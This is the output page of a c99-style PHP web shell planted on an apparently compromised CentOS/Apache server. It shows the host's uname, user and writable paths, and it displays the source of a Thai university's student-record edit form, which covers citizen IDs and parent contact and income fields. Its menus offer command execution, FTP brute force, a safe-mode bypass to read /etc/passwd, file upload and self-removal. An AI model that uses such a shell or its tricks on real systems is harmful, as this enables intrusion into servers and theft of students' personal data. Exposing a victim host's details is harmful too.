!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_editStudentMBInfo1.php (12.72 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_cfg 
= (isset($qu_cfg) && $qu_cfg->num_rows()) ? $qu_cfg->row() : NULL;
$row_std = (isset($qu_std) && $qu_std->num_rows()) ? $qu_std->row() : NULL;
$row_ctc = (isset($ctc) && $ctc->num_rows()) ? $ctc->row() : NULL;
$row_adv = (isset($adv) && $adv->num_rows()) ? $adv->row() : NULL;
$row_parent = (isset($parent) && $parent->num_rows()) ? $parent->row() : NULL;
?>
<table width="100%">
    <tr>
        <td><?php echo form_open($this->config->item("rg_folder")."studentinfo/std_insertStdMBInfo1", array("name" => "myform""id" => "myform"));?>
        <table class="szone">
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td colspan="2" class="coltd_szone"><span class="h error">ข้อมูลประวัติส่วนตัว</span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">รหัสประจำตัวนักศึกษา</td>
                <td><?php echo setValue('stdCode',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">เลขที่บัตรประจำตัวประชาชน</td>
                <td><?php //echo setValue('sdtCitizenId',$row_std); // edit 20/2/2556 ให้แก้ไขได้?>
                <input type="text" name="sdtCitizenId" id="sdtCitizenId" value="<?php echo set_value('sdtCitizenId',setValue('sdtCitizenId',$row_std));?>" size="15" maxlength="13" /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ระดับการศึกษา</td>
                <td><?php echo setValue('levelName',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">หลักสูตร</td>
                <td><?php echo setValue('curName',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ชื่อ-สกุล (ไทย)</td>
                <td>
<?php
                
echo form_dropdown('stdPfId'$rs_pfset_value('stdPfId',setValue('stdPfId',$row_std)));
?>
                <input type="text" name="stdName" id="stdName" value="<?php echo set_value('stdName',setValue('stdName',$row_std));?>" size="20" maxlength="50" />
                <input type="text" name="stdSurname" id="stdSurname" value="<?php echo set_value('stdSurname',setValue('stdSurname',$row_std));?>" size="20" maxlength="50" />
                <span class="error">*<?php echo form_error('stdPfId') ? form_error('stdPfId') : (form_error('stdName') ? form_error('stdName') : form_error('stdSurname'));?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ชื่อ-สกุลผู้ปกครอง (ไทย)</td>
                <td>
<?php
                
echo form_dropdown('sdtPfIdParent'$rs_pfset_value('sdtPfIdParent',setValue('sdtPfIdParent',$row_parent)));
?>
                <input type="text" name="sdtParentName" id="sdtParentName" value="<?php echo set_value('sdtParentName',setValue('sdtParentName',$row_parent));?>" size="20" maxlength="50" />
                <input type="text" name="sdtParentSurname" id="sdtParentSurname" value="<?php echo set_value('sdtParentSurname',setValue('sdtParentSurname',$row_parent));?>" size="20" maxlength="50" />
                </td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ความสัมพันธ์กับนักศึกษา</td>
                <td><input type="text" name="sdtParentRelationship" id="sdtParentRelationship" value="<?php echo set_value('sdtParentRelationship',setValue('sdtParentRelationship',$row_parent));?>" size="15" maxlength="30" /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ที่อยู่ผู้ปกครองที่สามารถติดต่อได้</td>
                <td><input type="text" name="sdtParentAddr" id="sdtParentAddr" value="<?php echo set_value('sdtParentAddr',setValue('sdtParentAddr',$row_parent));?>" size="30" maxlength="50" /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ตำบล</td>
                <td>
                <input type="text" name="dtNameParent" id="dtNameParent" value="<?php echo setValue('dtNameParent',$row_parent);?>" class="input2" readonly />
                <input type="hidden" name="sdtDtIdParent" id="sdtDtIdParent" value="<?php echo setValue('sdtDtIdParent',$row_parent);?>" readonly />
<?php
                
echo anchor_popup($this->config->item("rg_folder")."popup/dtParent_popup""<img src=\"".base_url().$this->config->item('rg_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">อำเภอ</td>
                <td>
                <input type="text" name="apNameParent" id="apNameParent" value="<?php echo setValue('apNameParent',$row_parent);?>" class="input2" readonly />
                <input type="hidden" name="sdtApIdParent" id="sdtApIdParent" value="<?php echo setValue('sdtApIdParent',$row_parent);?>" readonly /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">จังหวัด</td>
                <td>
                <input type="text" name="prvNameParent" id="prvNameParent" value="<?php echo setValue('prvNameParent',$row_parent);?>" class="input2" readonly />
                <input type="hidden" name="sdtPrvIdParent" id="sdtPrvIdParent" value="<?php echo setValue('sdtPrvIdParent',$row_parent);?>" readonly /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">รหัสไปรษณีย์</td>
                <td><input type="text" name="sdtParentPostCode" id="sdtParentPostCode" value="<?php echo set_value('sdtParentPostCode',setValue('sdtParentPostCode',$row_parent))?>" size="6" maxlength="5" class="required-int" />
                <span class="error"><?php echo form_error('sdtParentPostCode');?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">เบอร์โทรศัพท์บ้าน</td>
                <td><input type="text" name="sdtParentPhoneNo" id="sdtParentPhoneNo" value="<?php echo set_value('sdtParentPhoneNo',setValue('sdtParentPhoneNo',$row_parent))?>" size="20"  /><!-- maxlength="10" class="required-int" -->
                <span class="error"><?php echo form_error('sdtParentPhoneNo');?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">เบอร์โทรศัพท์มือถือ</td>
                <td><input type="text" name="sdtParentMobileNo" id="sdtParentMobileNo" value="<?php echo set_value('sdtParentMobileNo',setValue('sdtParentMobileNo',$row_parent))?>" size="20"  /><!-- maxlength="10" class="required-int" -->
                <span class="error"><?php echo form_error('sdtParentMobileNo');?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">อาชีพผู้ปกครอง</td>
                <td><input type="text" name="sdtParentOccupation" id="sdtParentOccupation" value="<?php echo set_value('sdtParentOccupation',setValue('sdtParentOccupation',$row_parent));?>" size="15" maxlength="30" /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">รายได้ผู้ปกครอง</td>
                <td><input type="text" name="sdtParentIncome" id="sdtParentIncome" value="<?php echo set_value('sdtParentIncome',setValue('sdtParentIncome',$row_parent));?>" size="7" maxlength="6" class="required-int" />
                <span class="error"><?php echo form_error('sdtParentIncome');?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">อีเมล์ผู้ปกครอง</td>
                <td><input type="text" name="sdtParentEmail" id="sdtParentEmail" value="<?php echo set_value('sdtParentEmail',setValue('sdtParentEmail',$row_parent));?>" size="15" maxlength="30" /></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ภาค/ปีการศึกษาที่เข้า</td>
                <td><?php echo setValue('tmCode',$row_std).'/'.setValue('stdAdY',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">วันที่รับเข้า</td>
                <td><?php echo abbreDate2(setValue('stdAdmitDate',$row_std));?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">วันที่สิ้นสุดการเป็นนักศึกษา</td>
                <td><?php echo (setValue('stdGraduateDate',$row_std)=='0000-00-00') ? '-' abbreDate2(setValue('stdGraduateDate',$row_std));?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ชั้นปีนักศึกษา</td>
                <td><?php echo setValue('syCode',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">สถานะของนักศึกษา</td>
                <td><?php echo setValue('sstName',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">สถานะทางการเงิน</td>
                <td><?php echo setValue('fsName',$row_std);?></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">เจ้าของทุน</td>
                <td><input type="text" name="soName" id="soName" value="<?php echo setValue('soName',$row_std);?>" size="25" class="input2" readonly />
                <input type="hidden" name="stdSoId" id="stdSoId" value="<?php echo setValue('stdSoId',$row_std);?>" readonly />
<?php
                
echo anchor_popup($this->config->item("rg_folder")."popup/so_popup""<img src=\"".base_url().$this->config->item('rg_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "500""height" => "400"));
?>
                <span class="error">*<?php echo form_error('stdSoId');?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">จังหวัดเจ้าของทุน</td>
                <td><input type="text" name="prvNameSo" id="prvNameSo" value="<?php echo setValue('prvNameSo',$row_std);?>" class="input2" readonly />
                </td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">ประเภททุน</td>
                <td>
<?php
                
echo form_dropdown('stdEtId'$rs_etset_value('stdEtId',setValue('stdEtId',$row_std)));
?>
                <span class="error">*<?php echo form_error('stdEtId');?></span></td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">สถานะ/ตำแหน่งก่อนเข้าเรียน</td>
                <td>
<?php
                
echo form_dropdown('stdPaId'$rs_paset_value('stdPaId',setValue('stdPaId',$row_std)));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">สิทธิการเบิกค่าเล่าเรียน</td>
                <td>
                <input type="radio" name="sdtCanRefund" id="sdtCanRefund" value="Y" <?php echo ((setValue('sdtCanRefund',$row_std)!='N') ? 'checked' '');?> /> มี
                <input type="radio" name="sdtCanRefund" id="sdtCanRefund" value="N" <?php echo ((setValue('sdtCanRefund',$row_std)=='N') ? 'checked' '');?> /> ไม่มี
                </td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td class="coltd_szone2">สิทธิการรักษาพยาบาล</td>
                <td>
<?php
                
echo form_dropdown('sdtHpId'$rs_hpset_value('sdtHpId',setValue('sdtHpId',$row_std)));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo setValue('cfgBgClSwapTr',$row_cfg);?>">
                <td colspan="2" align="center">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="reset" name="clear" id="clear" value="เคลียร์ข้อมูล" />
                <input type="button" name="cancel" id="cancel" value="ยกเลิก" onClick="location.href='<?php echo site_url($this->config->item('rg_folder')."studentinfo/std_showInfo");?>'" />
                <input type="hidden" name="stdId" id="stdId" value="<?php echo $stdId;?>" />
                <input type="hidden" name="tab" id="tab" value="<?php echo $tab;?>" />
                </td>
            </tr>
        </table><?php echo form_close();?></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0102 ]--